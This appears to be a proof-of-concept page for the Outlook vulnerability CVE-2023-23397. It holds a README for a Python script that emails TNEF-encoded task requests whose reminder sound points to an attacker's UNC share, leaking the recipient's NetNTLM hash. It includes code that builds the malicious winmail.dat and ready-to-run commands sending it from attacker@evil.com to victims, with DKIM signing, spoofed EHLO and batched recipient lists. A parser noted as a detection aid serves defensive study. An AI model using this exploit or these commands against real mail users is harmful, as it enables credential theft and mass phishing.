POC details: 43b430a532e0b7efe3aba8f8986da88cf9ed3a96

Source
Related vulnerability
Title: Microsoft Outlook security vulnerability (CVE-2023-23397)
Description: Microsoft Outlook is an e-mail application from Microsoft Corporation (US). Microsoft Outlook contains a security vulnerability. The following products and versions are affected: Microsoft Office LTSC 2021 for 32-bit editions, Microsoft Outlook 2016 (32-bit edition), Microsoft Office LTSC 2021 for 64-bit editions, Microsoft 365 Apps for Enterprise for
Description
Python script for sending e-mails with a CVE-2023-23397 payload using SMTP
Introduction
# CVE-2023-23397

This script creates TNEF-encoded Outlook e-mails carrying the CVE-2023-23397 exploit payload and sends them over plain SMTP; no COM objects or EWS are needed.

I could not get the `IPM.Schedule.Meeting.Request` message class to work properly (it generates both the meeting and the reminder but does not respect the `PidLidReminderOverride` property for some reason), so instead the script abuses the `IPM.TaskRequest` class. This results in a malicious meeting reminder popup just like in the original exploit, but the recipient cannot view the message body or the meeting details. In OWA, however, the e-mail looks like a regular message without an appointment.

Tested on Outlook 365 16130.20218 and Outlook 2019 10395.20020. Note that the TNEF attachment and headers may not make it through anti-spam filters when the e-mails are sent externally; I only tested this by sending e-mails directly (or via a Postfix relay) to Exchange from a Linux machine on the same LAN.
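The encoding the paragraphs above rely on, as an added example (this is not the `cve-2023-23397.py` script from this repository, nor tnefparse): it builds a minimal TNEF stream that carries `PidLidReminderSet`, `PidLidReminderOverride` and `PidLidReminderFileParameter` as named properties inside an `attMAPIProps` attribute, sets the message class the README uses, wraps the stream as a `winmail.dat` attachment, and parses it back with checksum verification so the bytes can be inspected. Attribute and property identifiers follow MS-OXTNEF and MS-OXPROPS; the `0x1234` legacy key and the sample UNC path are constructed values; whatever additional task or reminder-timing properties the real script sets to make Outlook actually fire the reminder are intentionally not reproduced here.

```python
"""Minimal TNEF (winmail.dat) builder for the reminder properties this page
describes, plus a parser that checks the encoding. Added example, not the PoC script."""
import struct
import uuid
from email.message import EmailMessage

# TNEF stream constants (MS-OXTNEF)
TNEF_SIGNATURE = 0x223E9F78
LVL_MESSAGE = 0x01
ATT_TNEF_VERSION, ATT_OEM_CODEPAGE = 0x00089006, 0x00069007
ATT_MESSAGE_CLASS, ATT_MAPI_PROPS = 0x00018008, 0x00069003
PT_BOOLEAN, PT_UNICODE = 0x000B, 0x001F
# Named reminder properties in the PSETID_Common property set (MS-OXPROPS)
PSETID_COMMON = uuid.UUID("00062008-0000-0000-C000-000000000046")
LID_REMINDER_SET, LID_REMINDER_OVERRIDE, LID_REMINDER_FILE_PARAMETER = 0x8503, 0x851C, 0x851F

def _bool_value(flag: bool) -> bytes:
    return struct.pack("<HH", int(flag), 0)  # 2-byte value padded to 4

def _unicode_value(text: str) -> bytes:
    raw = text.encode("utf-16-le") + b"\0\0"  # null-terminated UTF-16LE
    return struct.pack("<II", 1, len(raw)) + raw + b"\0" * (-len(raw) % 4)  # count, byte length, data padded to 4

def _named_prop(ptype: int, lid: int, value: bytes) -> bytes:
    """attMAPIProps entry; an ID >= 0x8000 marks a named property identified
    by the GUID plus LID (name kind 0) that follow."""
    return struct.pack("<HH", ptype, 0x8000) + PSETID_COMMON.bytes_le + struct.pack("<II", 0, lid) + value

def _attribute(att_id: int, data: bytes) -> bytes:
    """Level, attribute ID, length, data, 16-bit checksum (sum of data bytes)."""
    return struct.pack("<BII", LVL_MESSAGE, att_id, len(data)) + data + struct.pack("<H", sum(data) & 0xFFFF)

def build_tnef(unc_path: str, message_class: str = "IPM.TaskRequest", codepage: int = 1252) -> bytes:
    """TNEF stream whose reminder properties point the reminder sound at unc_path."""
    props = [
        _named_prop(PT_BOOLEAN, LID_REMINDER_SET, _bool_value(True)),
        _named_prop(PT_BOOLEAN, LID_REMINDER_OVERRIDE, _bool_value(True)),
        _named_prop(PT_UNICODE, LID_REMINDER_FILE_PARAMETER, _unicode_value(unc_path)),
    ]
    return (struct.pack("<IH", TNEF_SIGNATURE, 0x1234)  # signature + non-zero legacy key (constructed)
            + _attribute(ATT_TNEF_VERSION, struct.pack("<I", 0x00010000))
            + _attribute(ATT_OEM_CODEPAGE, struct.pack("<II", codepage, 0))
            + _attribute(ATT_MESSAGE_CLASS, message_class.encode("ascii") + b"\0")
            + _attribute(ATT_MAPI_PROPS, struct.pack("<I", len(props)) + b"".join(props)))

def build_message(tnef: bytes, sender: str, recipient: str, subject: str, body: str) -> EmailMessage:
    """Carry the stream as the winmail.dat attachment that Exchange and Outlook decode."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, subject
    msg.set_content(body)
    msg.add_attachment(tnef, maintype="application", subtype="ms-tnef", filename="winmail.dat")
    return msg

def _parse_mapi_props(data: bytes) -> dict:
    (count,), off, out = struct.unpack_from("<I", data), 4, {}
    for _ in range(count):
        ptype, key = struct.unpack_from("<HH", data, off)
        off += 4
        if key >= 0x8000:  # named property: GUID (16) + name kind (4) + LID (4)
            kind, key = struct.unpack_from("<II", data, off + 16)
            if kind != 0:
                raise NotImplementedError("string-named properties not handled")
            off += 24
        if ptype == PT_BOOLEAN:
            out[key] = bool(struct.unpack_from("<H", data, off)[0])
            off += 4
        elif ptype == PT_UNICODE:
            (nvals,) = struct.unpack_from("<I", data, off)
            off += 4
            for _ in range(nvals):
                (length,) = struct.unpack_from("<I", data, off)
                off += 4
                out[key] = data[off:off + length].decode("utf-16-le").rstrip("\0")
                off += length + (-length % 4)
        else:
            raise NotImplementedError("property type 0x%04X not handled" % ptype)
    return out

def parse_tnef(blob: bytes) -> dict:
    """Walk the attribute list, verify every checksum, return message class + attMAPIProps keyed by LID."""
    if struct.unpack_from("<I", blob)[0] != TNEF_SIGNATURE:
        raise ValueError("not a TNEF stream")
    off, found = 6, {}
    while off < len(blob):
        _level, att_id, length = struct.unpack_from("<BII", blob, off)
        data = blob[off + 9:off + 9 + length]
        if struct.unpack_from("<H", blob, off + 9 + length)[0] != sum(data) & 0xFFFF:
            raise ValueError("bad checksum on attribute 0x%08X" % att_id)
        if att_id == ATT_MESSAGE_CLASS:
            found["message_class"] = data.rstrip(b"\0").decode("ascii")
        elif att_id == ATT_MAPI_PROPS:
            found.update(_parse_mapi_props(data))
        off += 9 + length + 2
    return found

if __name__ == "__main__":  # constructed sample; 10.10.10.10 stands in for the attacker's share
    blob = build_tnef(r"\\10.10.10.10\share\1.wav")
    print(parse_tnef(blob))
    print(build_message(blob, "attacker@evil.com", "victim@example.com", "Test meeting", "Please ignore."))
```

`parse_tnef` is also the shape of check a defender wants over a captured `winmail.dat`: a `PidLidReminderFileParameter` (LID 0x851F) holding a UNC path is the indicator for this CVE, and the same walk can be pointed at any `application/ms-tnef` attachment pulled from mail flow. The script's `--codepage` option corresponds to the `attOemCodepage` attribute written here.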

## Usage

```
options:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        smtp mail relay (host[:port]), default: localhost:25
  -f SENDER, --from SENDER
                        sender email address
  -t TO, --to TO        recipient email address(es), path to a file or comma-separated values
  -S SUBJECT, --subject SUBJECT
                        message subject
  -r ROOM, --room ROOM  meeting location (room name), default: Meeting Room #1
  -b BODY, --body BODY  plaintext message body (or path to file)
  --html HTML           HTML message body (or path to file)
  -p PATH, --path PATH  remote file path for NetNTLM exfiltration, e.g \\10.10.10.10\share\1.wav
  -a AUTH, --auth AUTH  username:password for AUTH command if authenticated send is required
  --codepage CODEPAGE   windows codepage (e.g. 1252=ASCII, 65001=Unicode) to encode HTML body (if any), default: 1252
  --ehlo EHLO, --helo EHLO
                        EHLO command argument (sender external hostname)
  -l LANG, --lang LANG  Content-Language header value, default: en-US
  --starttls            Use STARTTLS when communicating over plaintext SMTP
  --max-rcpts MAX_RCPTS
                        Maximum number of recipients per send attempt
  -v                    Enable debug output

DKIM message signing:
  --dkim-selector DKIM_SELECTOR
                        DKIM selector
  --dkim-key DKIM_KEY   DKIM private key file path
  --dkim-domain DKIM_DOMAIN
                        DKIM domain name, default: sender address part after @

```

## Examples

Send the e-mail from `attacker@evil.com` to `victim@example.com`:
```shell
python3 cve-2023-23397.py -s localhost:25 -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@evil.com -t victim@example.com -S 'Test meeting' -b 'This is a test meeting, please ignore it.'
```

Send the e-mail to multiple recipients with opportunistic TLS and HTML body from file:
```shell
python3 cve-2023-23397.py -s mail.example.com:25 -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@evil.com -t victim1@example.com,victim2@example.com -S 'Test meeting' -b 'This is a test meeting, please ignore it.' --html ./body.html --starttls
```

Send the e-mail with DKIM signature (requires `pip install dkimpy`) and custom domain in EHLO command to recipients loaded from file, three recipients per message:
```shell
python3 cve-2023-23397.py -s mail.example.com:25 -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@evil.com -t ./recipients.txt -S 'Test Meeting' -b 'This is a test meeting, please ignore it.' --html ./body.html --starttls --max-rcpts 3 --dkim-key ./dkim.private --dkim-domain evil.com --dkim-selector default --ehlo mail.evil.com
```

Send the e-mail with domain credentials:
```shell
python3 cve-2023-23397.py -s mail.example.com:587 --auth 'EXAMPLE\attacker:12345678' -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@example.com -t victim@example.com -S 'Test meeting' -b 'This is a test meeting, please ignore it.' --starttls
```

## Credits

- [Original research from MDSec](https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/)
- [tnefparse](https://github.com/koodaamo/tnefparse) for TNEF-related python code
File snapshot

```
[4.0K] /data/pocs/43b430a532e0b7efe3aba8f8986da88cf9ed3a96
├── [ 18K] cve-2023-23397.py
└── [4.1K] README.md

0 directories, 2 files
```